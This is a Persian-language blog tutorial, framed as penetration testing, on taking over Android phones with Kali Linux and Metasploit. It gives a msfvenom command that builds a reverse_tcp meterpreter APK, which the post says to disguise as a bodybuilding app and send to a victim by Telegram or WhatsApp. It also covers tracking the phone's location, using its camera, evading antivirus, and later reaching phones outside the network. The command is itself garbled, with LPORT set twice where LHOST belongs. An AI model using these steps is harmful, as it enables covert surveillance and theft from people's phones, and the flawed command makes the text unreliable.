هک گوشی اندروید+تست نفوذ
mba
11 شهریور 1400
دسته بندی هک و امنیت
سلام
دوستان تو ایـــن پست در مورد نفوذ به سیستم عامل ویندوز نکته ای رو اموزش دادم
این مطلب در ادامه همون و با استفاده از ابزارهای کالی لینوکس پلفرم محبوب هکرها میخام نحوه نفوذ به گوشی اندرویدی رو اموزش بدوم
هدف ارتقا دانش امنیت در فضای سایبری هست هر چند این نوع اموزشها صرف اموزش پایه هست و پارامترهای زیادی با موضوع اصلی فاصله هست
پس ازمطالعه این اموزش میتونید تست نفوذ رو انجام بدید سیستم من کالی لینوکس رو ماشین مجازی نصب شده ولی اصولش اینه لایو(live) باشه یعنی کالی بعنوان سیستم اصلی نصب بشه عمده ترین تفاوت در تنظیمات شبکه و سرعت انجام کار هست
من فرض میکنم شما آموزشهای لینوکس کالی را برای مبتدیان خواندید. در لینوکس کالی، ابزار شناخته شده به عنوان Metasploit وجود دارد
Metasploit چارچوبی است که در اون هر نوع ابزار تست موجود است. شما می توانید هر چیزی مانند کامپیوتر، سرور، -، و غیره هک کنید. اگر شما مبتدی باشید، آموزش Metasploit رو میتونید در گوگل جستجو کنید در سایتهای داخلی هم توضیح زیاده
بصورت خلاصه متاسپلویت چارچوبی برای تست نفوذ هست
من مراحلی که در انجام تست نفوذ انجام دادم رو بصورت مرحله به مرحله اسکرین شات تهیه کردم بصورت ترتیبی با توضیح میزارم
خب وقتی وارد محیط کالی شدید ترمینال لینوکس رو باز کنید
در ترمینال برای گرفتن ای پی این درستور رو وارد کنید
ifconfig
دستور msfvenom توضیح کوچیک
Msfvenom یک نمونه خط فرمان از Metasploit است که برای تولید و خروجی انواع مختلف کد های پوسته موجود در Metasploit استفاده می شود
خب ابتدا ای پی لینوکس رو با دستور بالا میگیریم
سپس در قدم اول یه فایل apk برای نصب در سیستم قربانی تهیه میکنیم فقط با یک خط
msfvenom -p android/meterpreter/reverse_tcp LPORT=192.168.199.137 LPORT=4444 -R> anyname.apk
خب پس از نوشتن دستور بالا با زدن اینتر یه فایل اندرویدی با نام دلخواه در پوشه home ایجاد میشه میتونید میسر هم بهش بدید اما اینجا وارد جزیییات نمیشیم
فایل ایجاد شده رو به یه هاستی اپلود کنید و یا به نحوی از طریق تلگرام و یا واتس اپ به گوشی خودتون بفرستید
در حین نصب مانند شکل زیر
دسترسی های زیادی میگیره تقریبا همه دسترسی ها رو میگیره و در حین نصب اگه اندروید بالای 4 باشه اخطار ویروس میده --خب یه توضیح
توی سی شارپ وقتی یه کی لاگر مینویسم خیلی شده در لحظه اجرا همون بیت دفندر ویندوز بهش گیر داده و پاکش کرده اما اگه کد نویس کدنویس باشه میتونه کاری کنه انتی ویروس اصلا بهش گیر نده--
خب اینم همینطوره میتونید با اضافه کردن پارامترهای ساخت برنامه اندرویدی از این کار جلوگیری کنید این بحث گسترده است--
توضیح مختصر
در payload من reverse_tcp دارم چون تمام قوانین فایروال را حذف می کند و فایر وال رو دور میزنه بهمون خاطر انتی ویروس بهش گیر میده
LHOST: آدرس IP لوکال شماست اطمینان حاصل کنید که هدف تلفن همراه شما از همان شبکه استفاده می کند. بعدا، به شما خواهم گفت که چگونه گوشی های اندرویدی که خارج از شبکه شما هستند را هک کنید.
LPORT: برای انتخاب شماره پورت من 4444 را انتخاب کرده ام زیرا رایگان است. شما می توانید هر کسی را انتخاب کنید، اما در مورد خاص، من شما را توصیه انتخاب 443. این شماره پورت برای https است
خب دوبره برمیگیردیم به صفحه کنسول یا ترمینال لینوکس
در محیط ترمینال این دستور رو میزنید
شروع اکسپولیت
تنظیم ای پی و پورت همه کدها رو یکجا بعدا نشون میدم
الان سیستم در حالت اماده باش قرار داره تا با باز شدن برنامه به گوشی متصل بشه
این تصویر کل عملیات هست
میتونید در قالب یه برنامه بدنسازی یا هر اسمی به قربانی بفرستید
الان قربانی با باز کردن برنامه عین دستورات زیر در کنسول یا همون ترمینال درج میشه و دسترسی به گوشی ازاد میشه
چند دستور ساده
مکانیابی گوشی قربانی
مرورگر باز میشه و از دوربین دسترسی میگیره
برای ادامه با زدن دستور help گزینه همه دستورات مربوط به اندروید و نحوه کارکردن با ارسال و دریافت فایل نمایش داده میشه
خوب برای هک افراد خارج از شبکه شما باید port forward انجام بدید اونم یه اموزش مجزاست تقریبا زمانش هم زیاده لینک میدم بعدا وقت کردم میگم
یادتون نره مودم شما باید قابلیت پورت فورواردینگ رو داشته باشه
msfconsole چیست,ارمیتاژ,اسپلویت,تست نفوذ,راههای نفوذ,متااسپلویت,نفوذ به گوشی,هک,اندروید,موبایل,هک و امنیت,هک پسورد,هک گوشی,کالی لینوکس,WebDesignerمحمدباقر آیرملو
برای ارسال نظر شما باید ابتدا وارد حساب کاربری خود شوید.
نظرات